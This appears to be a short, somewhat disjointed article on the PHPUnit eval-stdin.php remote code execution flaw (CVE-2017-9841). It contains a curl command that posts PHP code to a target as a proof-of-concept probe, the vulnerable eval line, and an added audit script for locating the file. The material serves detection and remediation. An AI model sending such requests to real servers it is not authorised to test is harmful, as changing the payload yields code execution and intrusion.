Vendor Phpunit Phpunit Src Util Php Eval-stdin.php Exploit Direct

curl -X POST https://target.com/eval-stdin.php -d "<?php echo 5*5; ?>"

If the response contains 25, it is 100% vulnerable.

The vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php exploit is a masterclass in how a developer convenience tool becomes a production nightmare.

In the ecosystem of web application security, few vulnerabilities have caused as widespread, silent, and persistent damage as the PHPUnit eval-stdin Remote Code Execution (RCE) vulnerability (tracked as CVE-2017-9841).

Check your servers today. Run the find command. That ghost might be lurking in your dependencies, waiting for a POST request.

<?php
// vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
// Vulnerable: when this file is reachable over HTTP, the raw request body
// (php://input) is evaluated as PHP code.
eval('?>' . file_get_contents('php://input'));
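The find check mentioned above can be scripted to locate every copy of the file and flag the ones that still read php://input. This is an added example, not code from PHPUnit or from the original page; the function names and the VULNERABLE/REVIEW labels are assumptions, and it relies on patched PHPUnit releases reading php://stdin instead of php://input.

```shell
#!/bin/sh
# Added example: audit a directory tree for PHPUnit's eval-stdin.php.
# Function names and status labels are hypothetical, chosen for this example.

# Print one line per copy found, in the form "<STATUS> <path>":
#   VULNERABLE  the script evaluates the HTTP request body (php://input)
#   REVIEW      the script does not read php://input, but dev tooling is
#               still deployed and should not sit under the web root
# Note: paths containing newlines are not handled.
audit_eval_stdin() {
    root=${1:-.}
    find "$root" -type f -name 'eval-stdin.php' -path '*/src/Util/PHP/*' 2>/dev/null |
    while IFS= read -r f; do
        if grep -q 'php://input' "$f"; then
            printf 'VULNERABLE %s\n' "$f"
        else
            printf 'REVIEW %s\n' "$f"
        fi
    done
}

# Return 0 when no vulnerable copy exists under the root, 1 otherwise,
# so the check can gate a deployment or CI job.
tree_is_clean() {
    ! audit_eval_stdin "${1:-.}" | grep -q '^VULNERABLE '
}

# When run with a directory argument, print the audit for that tree.
[ "$#" -eq 0 ] || audit_eval_stdin "$1"
```

Run it against the deployed document root rather than the source checkout, since the risk is the file being served by the web server.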